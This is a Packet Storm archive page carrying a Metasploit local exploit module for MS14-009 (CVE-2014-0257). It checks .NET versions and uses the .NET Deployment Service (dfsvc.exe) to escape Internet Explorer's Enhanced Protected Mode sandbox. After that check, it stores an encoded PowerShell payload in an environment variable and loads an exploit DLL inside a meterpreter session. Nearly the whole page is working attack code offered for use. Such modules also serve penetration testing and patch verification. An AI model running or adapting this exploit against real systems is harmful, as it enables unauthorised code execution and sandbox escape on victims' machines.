exploit the possibilities

MS14-009 .NET Deployment Service IE Sandbox Escape

MS14-009 .NET Deployment Service IE Sandbox Escape
Posted Jun 27, 2014
Authored by juan vazquez, James Forshaw | Site metasploit.com

This Metasploit module abuses a process creation policy in the Internet Explorer Sandbox which allows to escape the Enhanced Protected Mode and execute code with Medium Integrity. The problem exists in the .NET Deployment Service (dfsvc.exe), which can be run as Medium Integrity Level. Further interaction with the component allows to escape the Enhanced Protected Mode and execute arbitrary code with Medium Integrity.

tags | exploit, arbitrary
advisories | CVE-2014-0257
MD5 | 6fa97cd4c465e9e94afcce09121b97e6

MS14-009 .NET Deployment Service IE Sandbox Escape

Change Mirror Download
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
require 'rex'
require 'msf/core/exploit/exe'
require 'msf/core/exploit/powershell'

class Metasploit3 < Msf::Exploit::Local
Rank = GreatRanking

include Msf::Exploit::Powershell
include Msf::Exploit::EXE
include Msf::Post::Windows::Priv
include Msf::Post::Windows::FileInfo
include Msf::Post::File

NET_VERSIONS = {
'4.5' => {
'dfsvc' => '4.0.30319.17929.17',
'mscorlib' => '4.0.30319.18063.18'
},
'4.5.1' => {
'dfsvc' => '4.0.30319.18408.18',
'mscorlib' => '4.0.30319.18444.18'
}
}

def initialize(info={})
super( update_info( info,
'Name' => 'MS14-009 .NET Deployment Service IE Sandbox Escape',
'Description' => %q{
This module abuses a process creation policy in the Internet Explorer Sandbox which allows
to escape the Enhanced Protected Mode and execute code with Medium Integrity. The problem
exists in the .NET Deployment Service (dfsvc.exe), which can be run as Medium Integrity
Level. Further interaction with the component allows to escape the Enhanced Protected Mode
and execute arbitrary code with Medium Integrity.
},
'License' => MSF_LICENSE,
'Author' =>
[
'James Forshaw', # Vulnerability Discovery and original exploit code
'juan vazquez' # metasploit module
],
'Platform' => [ 'win' ],
'SessionTypes' => [ 'meterpreter' ],
'Targets' =>
[
[ 'IE 8 - 11', { } ]
],
'DefaultTarget' => 0,
'DefaultOptions' =>
{
'WfsDelay' => 30
},
'DisclosureDate'=> "Feb 11 2014",
'References' =>
[
['CVE', '2014-0257'],
['MSB', 'MS14-009'],
['BID', '65417'],
['URL', 'https://github.com/tyranid/IE11SandboxEscapes']
]
))
end

def check
unless file_exist?("#{get_env("windir")}\\Microsoft.NET\\Framework\\v4.0.30319\\dfsvc.exe")
return Exploit::CheckCode::Unknown
end

net_version = get_net_version

if net_version.empty?
return Exploit::CheckCode::Unknown
end

unless file_exist?("#{get_env("windir")}\\Microsoft.NET\\Framework\\v4.0.30319\\mscorlib.dll")
return Exploit::CheckCode::Detected
end

mscorlib_version = get_mscorlib_version

if Gem::Version.new(mscorlib_version) >= Gem::Version.new(NET_VERSIONS[net_version]["mscorlib"])
return Exploit::CheckCode::Safe
end

Exploit::CheckCode::Vulnerable
end

def get_net_version
net_version = ""

dfsvc_version = file_version("#{get_env("windir")}\\Microsoft.NET\\Framework\\v4.0.30319\\dfsvc.exe")
dfsvc_version = dfsvc_version.join(".")

NET_VERSIONS.each do |k,v|
if v["dfsvc"] == dfsvc_version
net_version = k
end
end

net_version
end

def get_mscorlib_version
mscorlib_version = file_version("#{get_env("windir")}\\Microsoft.NET\\Framework\\v4.0.30319\\mscorlib.dll")
mscorlib_version.join(".")
end

def exploit
print_status("Running module against #{sysinfo['Computer']}") unless sysinfo.nil?

mod_handle = session.railgun.kernel32.GetModuleHandleA('iexplore.exe')
if mod_handle['return'] == 0
fail_with(Failure::NotVulnerable, "Not running inside an Internet Explorer process")
end

unless get_integrity_level == INTEGRITY_LEVEL_SID[:low]
fail_with(Failure::NotVulnerable, "Not running at Low Integrity")
end

print_status("Searching .NET Deployment Service (dfsvc.exe)...")

unless file_exist?("#{get_env("windir")}\\Microsoft.NET\\Framework\\v4.0.30319\\dfsvc.exe")
fail_with(Failure::NotVulnerable, ".NET Deployment Service (dfsvc.exe) not found")
end

net_version = get_net_version

if net_version.empty?
fail_with(Failure::NotVulnerable, "This module only targets .NET Deployment Service from .NET 4.5 and .NET 4.5.1")
end

print_good(".NET Deployment Service from .NET #{net_version} found.")

print_status("Checking if .NET is patched...")

unless file_exist?("#{get_env("windir")}\\Microsoft.NET\\Framework\\v4.0.30319\\mscorlib.dll")
fail_with(Failure::NotVulnerable, ".NET Installation can not be verified (mscorlib.dll not found)")
end

mscorlib_version = get_mscorlib_version

if Gem::Version.new(mscorlib_version) >= Gem::Version.new(NET_VERSIONS[net_version]["mscorlib"])
fail_with(Failure::NotVulnerable, ".NET Installation not vulnerable")
end

print_good(".NET looks vulnerable, exploiting...")

cmd = cmd_psh_payload(payload.encoded).gsub('%COMSPEC% /B /C start powershell.exe ','').strip
session.railgun.kernel32.SetEnvironmentVariableA("PSHCMD", cmd)

temp = get_env('TEMP')

print_status("Loading Exploit Library...")

session.core.load_library(
'LibraryFilePath' => ::File.join(Msf::Config.data_directory, "exploits", "CVE-2014-0257", "CVE-2014-0257.dll"),
'TargetFilePath' => temp + "\\CVE-2014-0257.dll",
'UploadLibrary' => true,
'Extension' => false,
'SaveToDisk' => false
)
end

def cleanup
session.railgun.kernel32.SetEnvironmentVariableA("PSHCMD", nil)
super
end

end

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

February 2020

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Feb 1st
    1 Files
  • 2
    Feb 2nd
    2 Files
  • 3
    Feb 3rd
    17 Files
  • 4
    Feb 4th
    15 Files
  • 5
    Feb 5th
    24 Files
  • 6
    Feb 6th
    16 Files
  • 7
    Feb 7th
    19 Files
  • 8
    Feb 8th
    1 Files
  • 9
    Feb 9th
    2 Files
  • 10
    Feb 10th
    15 Files
  • 11
    Feb 11th
    20 Files
  • 12
    Feb 12th
    12 Files
  • 13
    Feb 13th
    18 Files
  • 14
    Feb 14th
    17 Files
  • 15
    Feb 15th
    4 Files
  • 16
    Feb 16th
    4 Files
  • 17
    Feb 17th
    34 Files
  • 18
    Feb 18th
    15 Files
  • 19
    Feb 19th
    19 Files
  • 20
    Feb 20th
    20 Files
  • 21
    Feb 21st
    11 Files
  • 22
    Feb 22nd
    0 Files
  • 23
    Feb 23rd
    0 Files
  • 24
    Feb 24th
    0 Files
  • 25
    Feb 25th
    0 Files
  • 26
    Feb 26th
    0 Files
  • 27
    Feb 27th
    0 Files
  • 28
    Feb 28th
    0 Files
  • 29
    Feb 29th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2016 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close